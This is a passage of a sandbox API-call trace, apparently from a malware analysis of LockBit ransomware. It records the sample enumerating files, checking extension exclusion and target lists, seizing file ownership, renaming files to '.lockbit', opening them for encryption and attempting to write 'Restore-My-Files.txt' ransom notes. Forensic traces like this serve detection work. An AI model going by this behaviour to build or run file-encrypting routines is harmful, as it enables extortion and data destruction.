[0081.285] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.285] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.286] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.286] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.286] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="base_rtl.xml") returned 1 [0081.286] lstrcmpiW (lpString1="ntldr", lpString2="base_rtl.xml") returned 1 [0081.286] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="base_rtl.xml") returned 1 [0081.286] lstrcmpiW (lpString1="bootsect.bak", lpString2="base_rtl.xml") returned 1 [0081.286] lstrcmpiW (lpString1="autorun.inf", lpString2="base_rtl.xml") returned -1 [0081.286] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.286] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned=".xml" [0081.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.287] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.287] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.288] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.288] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit") returned 91 [0081.288] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit")) returned 0 [0081.288] GetLastError () returned 0x5 [0081.289] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.289] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.289] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.289] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.289] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.290] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.290] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.290] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.303] NtClose (Handle=0x3c0) returned 0x0 [0081.303] RtlFreeAnsiString (AnsiString="\\") [0081.303] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0081.303] malloc (_Size=0x200) returned 0x53fcc0 [0081.303] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.303] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.303] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.303] CloseHandle (hObject=0x3c0) returned 1 [0081.304] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.304] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.305] free (_Block=0x53fcc0) [0081.305] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.305] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit")) returned 1 [0081.306] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0081.306] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.306] malloc (_Size=0x40068) returned 0x3940048 [0081.306] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=617) returned 1 [0081.306] ReadFile (in: hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0081.311] GetLastError () returned 0x3e5 [0081.311] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.311] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.312] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.312] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0081.312] lstrcmpiW (lpString1=".", lpString2="ja-jp.xml") returned -1 [0081.312] lstrcmpiW (lpString1="..", lpString2="ja-jp.xml") returned -1 [0081.312] PathFindExtensionW (pszPath="ja-jp.xml") returned=".xml" [0081.312] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.312] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.313] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.314] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.314] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.314] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ja-jp.xml") returned 1 [0081.314] lstrcmpiW (lpString1="ntldr", lpString2="ja-jp.xml") returned 1 [0081.314] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ja-jp.xml") returned 1 [0081.314] lstrcmpiW (lpString1="bootsect.bak", lpString2="ja-jp.xml") returned -1 [0081.314] lstrcmpiW (lpString1="autorun.inf", lpString2="ja-jp.xml") returned -1 [0081.314] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.314] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned=".xml" [0081.314] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.315] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.315] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.316] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.316] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit") returned 88 [0081.316] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.316] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit")) returned 0 [0081.323] GetLastError () returned 0x5 [0081.323] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.323] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.323] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.324] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.324] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.324] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b8, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.325] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.325] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.336] NtClose (Handle=0x3b8) returned 0x0 [0081.336] RtlFreeAnsiString (AnsiString="\\") [0081.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b8) returned 1 [0081.337] malloc (_Size=0x200) returned 0x53fcc0 [0081.337] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.337] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.337] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.337] CloseHandle (hObject=0x3b8) returned 1 [0081.337] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.337] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.348] free (_Block=0x53fcc0) [0081.348] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.349] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit")) returned 1 [0081.349] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0081.350] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.350] malloc (_Size=0x40068) returned 0x206b860 [0081.350] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=16616) returned 1 [0081.350] ReadFile (in: hFile=0x3b8, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0081.765] GetLastError () returned 0x3e5 [0081.765] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.766] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.766] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.767] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0081.767] lstrcmpiW (lpString1=".", lpString2="ko-kr.xml") returned -1 [0081.767] lstrcmpiW (lpString1="..", lpString2="ko-kr.xml") returned -1 [0081.767] PathFindExtensionW (pszPath="ko-kr.xml") returned=".xml" [0081.767] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.767] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.768] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.769] 